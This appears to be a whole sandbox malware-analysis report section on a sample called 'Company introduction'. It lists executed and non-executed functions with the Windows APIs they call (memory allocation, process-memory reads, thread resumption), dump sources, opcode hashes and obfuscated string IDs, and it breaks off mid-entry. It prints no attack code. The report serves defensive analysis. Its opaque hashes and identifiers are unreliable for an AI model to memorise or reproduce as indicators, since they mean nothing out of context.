                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                                    • Opcode ID: a2d6496dd587c142b97b4a76ea211688bd173d3cc439b67dafa8845dd64f0dea
                                                                                                                                                    • Instruction ID: b8c6f64a529a711683af490a40ea04207b76c841335dddf8f87f3d76b3cd6bb4
                                                                                                                                                    • Opcode Fuzzy Hash: a2d6496dd587c142b97b4a76ea211688bd173d3cc439b67dafa8845dd64f0dea
                                                                                                                                                    • Instruction Fuzzy Hash: E02138B19002098FDB10DFAAC4857EEBBF4EF88324F108429D459A7240C7789945CFA4
                                                                                                                                                    Function 07E90A28 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07E90AA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1726664587-0
                                                                                                                                                    • Opcode ID: 36a7056ec37f984e536ab59e9e2e0adb5e1e1292bbf43e20696278218d807c8d
                                                                                                                                                    • Instruction ID: c4cae77834a00c009541bf0bf7e0d94a96cfc363e1a6c97965a4af2c1a88d148
                                                                                                                                                    • Opcode Fuzzy Hash: 36a7056ec37f984e536ab59e9e2e0adb5e1e1292bbf43e20696278218d807c8d
                                                                                                                                                    • Instruction Fuzzy Hash: FD2139B1800359DFCB10DFAAC845ADEFBF5FF48310F508429E558A7250C7749545CBA4
                                                                                                                                                    Function 014BEA48 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014BEACF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                    • Opcode ID: 613b84adaea0d8a3dffae35e259926db589de217d1762147cb1f0a452846c5c0
                                                                                                                                                    • Instruction ID: a1714f3315a6be406522ae6c27bf92721c0ef232643752cd65792f3a6e438c3e
                                                                                                                                                    • Opcode Fuzzy Hash: 613b84adaea0d8a3dffae35e259926db589de217d1762147cb1f0a452846c5c0
                                                                                                                                                    • Instruction Fuzzy Hash: 9921C4B59002589FDB10CF9AD584ADEBFF9FB48310F14841AE954A7350D374A944CFA5
                                                                                                                                                    Function 07E90470 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07E904E6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: 001a59545b47184f1a73de31dded212e8dab2005aa06a3ee1c78ed425eabed52
                                                                                                                                                    • Instruction ID: 3de2e9fcb0d03e6335ad08575d15ee20a19e9adcb7b4d7b1bde558dfdc98f0d1
                                                                                                                                                    • Opcode Fuzzy Hash: 001a59545b47184f1a73de31dded212e8dab2005aa06a3ee1c78ed425eabed52
                                                                                                                                                    • Instruction Fuzzy Hash: 99115CB29002499FCB10DFA9C4456DEFFF5EF48320F208419E555A7250C775A594CFA4
                                                                                                                                                    Function 014BB078 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 014BB0E5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                    • Opcode ID: 9e78a9a47e8ef5391c0dc0cb64a65951eae481e5cedf8a5e19a5d9108e0e3a7c
                                                                                                                                                    • Instruction ID: 5e90ba5171b25e16022d1d1a03efe5109ab9ab7bb0b436827ea179da923c081b
                                                                                                                                                    • Opcode Fuzzy Hash: 9e78a9a47e8ef5391c0dc0cb64a65951eae481e5cedf8a5e19a5d9108e0e3a7c
                                                                                                                                                    • Instruction Fuzzy Hash: D411BBB1801399CFDB20CF9AC8447EEBFF4EB09314F1084AAD599A7242C3399644CFA5
                                                                                                                                                    Function 07E90478 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07E904E6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: b2f5a6a53211e77f999da910e34af5ab8a9f14faa308d1d01461d350266b8f8d
                                                                                                                                                    • Instruction ID: 34dcb2c48dd5fadb0f565b0d8deff1a912498711446fcca679081e9b0f1bfafb
                                                                                                                                                    • Opcode Fuzzy Hash: b2f5a6a53211e77f999da910e34af5ab8a9f14faa308d1d01461d350266b8f8d
                                                                                                                                                    • Instruction Fuzzy Hash: 0A1137B29002499FCF20DFAAC845BDEBFF5EF88324F208429E559A7250C775A544CFA5
                                                                                                                                                    Function 07AEFC38 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                    • Opcode ID: 597a3b0ffd7f54993edd6402992055deff738cc6c7d2d2bb945888ea6307f6a0
                                                                                                                                                    • Instruction ID: bd80bd4f3e17e7ebf02d329582de095eaee9abcb7c9eb0e3be7b6863bdd7aaf4
                                                                                                                                                    • Opcode Fuzzy Hash: 597a3b0ffd7f54993edd6402992055deff738cc6c7d2d2bb945888ea6307f6a0
                                                                                                                                                    • Instruction Fuzzy Hash: AE116AB19002988FDB20DFAAD4447EEFFF5EF88324F24882AC459A7250C775A585CF94
                                                                                                                                                    Function 07AEFC40 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                    • Opcode ID: aa007314819647f1f1d152aa958150f5e8f8950f8ba71dbd33a152b637780ef5
                                                                                                                                                    • Instruction ID: defcac5f519a3ac4713eb8dd4b353629bdca488a880fb709b65dbb63d5c0312e
                                                                                                                                                    • Opcode Fuzzy Hash: aa007314819647f1f1d152aa958150f5e8f8950f8ba71dbd33a152b637780ef5
                                                                                                                                                    • Instruction Fuzzy Hash: 9D113AB19002598FDB20DFAAC4457DEFBF5EF88324F208829D459A7250C775A545CF94
                                                                                                                                                    Function 014BC760 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 014BC7C6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                    • Opcode ID: 0d04e79b7a8753b4058dd036c21b145b8846d2d2740d70a06023ac767eebffde
                                                                                                                                                    • Instruction ID: 7d401985b387ee471ebd114c8f915a841e6459cdf3c32771d8fe781a95c80a00
                                                                                                                                                    • Opcode Fuzzy Hash: 0d04e79b7a8753b4058dd036c21b145b8846d2d2740d70a06023ac767eebffde
                                                                                                                                                    • Instruction Fuzzy Hash: 031110B6C002498FDB10CF9AC484ADEFBF8EB88320F10846AD458B7610C375A545CFA5
                                                                                                                                                    Function 07E94F58 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07E94FBD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                                    • Opcode ID: 504099a3e32a490e05e1723a02bbf9065bc808f4b3e5207cbb1bdd5771cf2710
                                                                                                                                                    • Instruction ID: 0e0bd1b902ace84a1ea4546bf756c5a1fc44ca840dfefa332dbeba673d0ee6f9
                                                                                                                                                    • Opcode Fuzzy Hash: 504099a3e32a490e05e1723a02bbf9065bc808f4b3e5207cbb1bdd5771cf2710
                                                                                                                                                    • Instruction Fuzzy Hash: 6C1113B58003499FDB10DF9AD845BDEBBF8EB49324F10845AE558A3610C379A584CFA1
                                                                                                                                                    Function 07E90670 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07E94FBD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                                    • Opcode ID: 50bb8a8144a70b32e3ed29e2ace42a813f1cbb3714b9f990bce97b43288b21cc
                                                                                                                                                    • Instruction ID: 5fa116657fa9fb97376454d2e1e7bbd703ee6e7ba41876aee0373950835a8f16
                                                                                                                                                    • Opcode Fuzzy Hash: 50bb8a8144a70b32e3ed29e2ace42a813f1cbb3714b9f990bce97b43288b21cc
                                                                                                                                                    • Instruction Fuzzy Hash: 611122B6800349DFCB10DF8AC845BDEBBF8EB49320F208429E518A7240D375A994CFA4
                                                                                                                                                    Function 0145D1FC Relevance: .1, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731228820.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_145d000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6808c7ae18378af4b694ccfd161723ed43459c4037491ce70a8ed3b560977bc8
                                                                                                                                                    • Instruction ID: 16eb850f8fcd2032e7a75bab1ca50467d6d5b92f04cd290b1ce6f5caa8b6531e
                                                                                                                                                    • Opcode Fuzzy Hash: 6808c7ae18378af4b694ccfd161723ed43459c4037491ce70a8ed3b560977bc8
                                                                                                                                                    • Instruction Fuzzy Hash: 0C21E071904200EFDB469F98D984B2BBF65FF88320F20C56AED094A267C336D456CAA1
                                                                                                                                                    Function 0145D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731228820.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_145d000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1103c820d5fd689323f66922376bf230811d8f935720932a6ef3f9493d8cc14a
                                                                                                                                                    • Instruction ID: 34ce422b5718015ffea5217d76fa19094ede5b6c13c8714268a6196d1539c127
                                                                                                                                                    • Opcode Fuzzy Hash: 1103c820d5fd689323f66922376bf230811d8f935720932a6ef3f9493d8cc14a
                                                                                                                                                    • Instruction Fuzzy Hash: CF21F171900248EFDB45DF58D980B27BF65FF88318F20C56AED094A267C336D456CAA1
                                                                                                                                                    Function 0146D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731320392.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_146d000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f00a4fd8cf82beb1a5cb85334d6c3bce2cceef05c22bd0500356154b4b61a94f
                                                                                                                                                    • Instruction ID: 04a7af0b20f4e4d20bbac92bcb34be18a4acaa387d4e6cbd49c9f774ae1e15a6
                                                                                                                                                    • Opcode Fuzzy Hash: f00a4fd8cf82beb1a5cb85334d6c3bce2cceef05c22bd0500356154b4b61a94f
                                                                                                                                                    • Instruction Fuzzy Hash: 29212971B04200DFDB05DF98D9C0B26BBA9FB84328F24C56ED9894B366C336D446CA62
                                                                                                                                                    Function 0146D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731320392.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_146d000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a8a62f9226e6a896afdfcbc45e04f3fa517753e1c718f068973f72e08c08e23a
                                                                                                                                                    • Instruction ID: fa7c049d367d9170cf146c740a420d4f47a9305e5d3889c93e60b4899df0b9d4
                                                                                                                                                    • Opcode Fuzzy Hash: a8a62f9226e6a896afdfcbc45e04f3fa517753e1c718f068973f72e08c08e23a
                                                                                                                                                    • Instruction Fuzzy Hash: ED2125B1A04200DFCB15DF58D984B26BFA9EB8431CF20C56ED98A4B366C337D447CA62
                                                                                                                                                    Function 0146D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731320392.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_146d000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5ac1d73e238e883730164c7b00073e524807cd8979846bb87a629e1159ae1bf5
                                                                                                                                                    • Instruction ID: 6df5bd68708351c886a16254de2abcefb0cef9006de41ae72f778f483f11cac1
                                                                                                                                                    • Opcode Fuzzy Hash: 5ac1d73e238e883730164c7b00073e524807cd8979846bb87a629e1159ae1bf5
                                                                                                                                                    • Instruction Fuzzy Hash: D82180755093808FDB03CF24D594716BF71EB46218F28C5DBD8898F2A7C33A980ACB62
                                                                                                                                                    Function 0145D1F7 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731228820.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_145d000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                                                                                    • Instruction ID: 4d27da21f73ca9a59a41d96c8173500c28f266a78d2fca28a01bfb9d59432bf0
                                                                                                                                                    • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                                                                                    • Instruction Fuzzy Hash: FF219D76904240DFDB06CF54D9C4B56BF62FF84324F24C5AAED094A667C33AD42ACBA1
                                                                                                                                                    Function 0145D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731228820.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_145d000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                    • Instruction ID: 2b4411970616674620164b2528b67dad447995cd8ca2c0531ccbd08d04c30adb
                                                                                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                    • Instruction Fuzzy Hash: 8C11CD72804284CFCB02CF54D9C4B16BF61FB84218F24C6AADC090B267C336D45ACBA1
                                                                                                                                                    Function 0146D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731320392.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_146d000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction ID: 547cbec026e244d3e64e8841aacc7d49d842da07941216df17a5a71f025703d6
                                                                                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction Fuzzy Hash: 58118E75A04240DFDB16CF54D5C4B16BF61FB84228F28C6AAD8494B766C33AD44ACB52

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 07AE5362 Relevance: 5.3, Strings: 4, Instructions: 289COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: H4ux$H4ux$nay$nay
                                                                                                                                                    • API String ID: 0-2454568754
                                                                                                                                                    • Opcode ID: 5d5411ff31e2a02ef739ad3e081ff8901be109f354dfca17468023f909c2b0e0
                                                                                                                                                    • Instruction ID: bfaa1c049800f7440ee85a4fa7c40fb7c5d57f45a014817110e9df8801502f62
                                                                                                                                                    • Opcode Fuzzy Hash: 5d5411ff31e2a02ef739ad3e081ff8901be109f354dfca17468023f909c2b0e0
                                                                                                                                                    • Instruction Fuzzy Hash: 14D13BB0E11219CFDB14CFA9E980A9DFBB6FF89304F2491A9E419AB355DB309941CF50
                                                                                                                                                    Function 07AE23B8 Relevance: 5.2, Strings: 4, Instructions: 174COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: %O@8$%O@8$tQ=)$tQ=)
                                                                                                                                                    • API String ID: 0-749352435
                                                                                                                                                    • Opcode ID: 5ead03c8abc5f094e1d023b0e7cbc6bcc5fc049a66da70675b3a766ea3bee7e7
                                                                                                                                                    • Instruction ID: 4eedeefd50a7d6c08b7045d8dcadc9378ba5b00cfeb851486ea8adb2b41d374c
                                                                                                                                                    • Opcode Fuzzy Hash: 5ead03c8abc5f094e1d023b0e7cbc6bcc5fc049a66da70675b3a766ea3bee7e7
                                                                                                                                                    • Instruction Fuzzy Hash: 5E71F1B4E11609DFCB08CF99D584A9EFBF5FF89310F14856AE425AB260D734AA41CF50
                                                                                                                                                    Function 07AE2F68 Relevance: 5.2, Strings: 4, Instructions: 162COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 18'$18'$aY$aY
                                                                                                                                                    • API String ID: 0-3687307736
                                                                                                                                                    • Opcode ID: a0f65c220d01545b81efe146ced3282914f1bed28b962e64efd5a1042467150f
                                                                                                                                                    • Instruction ID: ae9ed743e817e034243e3acc641363d17ca7ca0a466677857c1bc6e65b9e92d6
                                                                                                                                                    • Opcode Fuzzy Hash: a0f65c220d01545b81efe146ced3282914f1bed28b962e64efd5a1042467150f
                                                                                                                                                    • Instruction Fuzzy Hash: 817103B5E1120ADFCB04CF99D5809AEFBB9FF89310F14851AD825AB304D734A982CF95
                                                                                                                                                    Function 07AE23A8 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: %O@8$tQ=)$tQ=)
                                                                                                                                                    • API String ID: 0-2920369752
                                                                                                                                                    • Opcode ID: ae0f66a93ebd53c736c557d70f6b1e6d239dcc1315db04161866c4fed1f9e72e
                                                                                                                                                    • Instruction ID: 98b67d00c5d275ed4d80332f47f35a2b608835bf1113e374090f4fd7040e89ce
                                                                                                                                                    • Opcode Fuzzy Hash: ae0f66a93ebd53c736c557d70f6b1e6d239dcc1315db04161866c4fed1f9e72e
                                                                                                                                                    • Instruction Fuzzy Hash: 5E7112B4E1160ADFCB08CFA9D58499EFBF5FF89310F14856AE425AB260D730AA41CF50
                                                                                                                                                    Function 07AE3A81 Relevance: 3.9, Strings: 3, Instructions: 119COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,uRR$6yu[$6yu[
                                                                                                                                                    • API String ID: 0-86511755
                                                                                                                                                    • Opcode ID: 4b138b6bdb284cfe0061498d9dd7241fdd8ccadf3bf4454d2d4a7332bbd2e7f2
                                                                                                                                                    • Instruction ID: a067dd5ad504ce45c786ae299aa355b49938815c6b3527d6ac9a4233d1adf6fb
                                                                                                                                                    • Opcode Fuzzy Hash: 4b138b6bdb284cfe0061498d9dd7241fdd8ccadf3bf4454d2d4a7332bbd2e7f2
                                                                                                                                                    • Instruction Fuzzy Hash: 504105B0E1520ADFCF08CFAAC5815AEFBF6EF89304F24D46AC415A7254D7349E818B95
                                                                                                                                                    Function 07AE3A90 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,uRR$6yu[$6yu[
                                                                                                                                                    • API String ID: 0-86511755
                                                                                                                                                    • Opcode ID: 5cd2d0c24b43c0e56105cb364b7988038240df86c8191c1d75adfc8acfd7a0ad
                                                                                                                                                    • Instruction ID: 6e045a788fb1fa798df69bf7e40fe9d49511480ae27737ba156e648ded49556c
                                                                                                                                                    • Opcode Fuzzy Hash: 5cd2d0c24b43c0e56105cb364b7988038240df86c8191c1d75adfc8acfd7a0ad
                                                                                                                                                    • Instruction Fuzzy Hash: A341F5B0E1520ADBCF04CFAAC5815AEFBF6FF89304F60D46AC415B7254D7349A828B95
                                                                                                                                                    Function 07AE69B8 Relevance: 2.8, Strings: 2, Instructions: 295COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
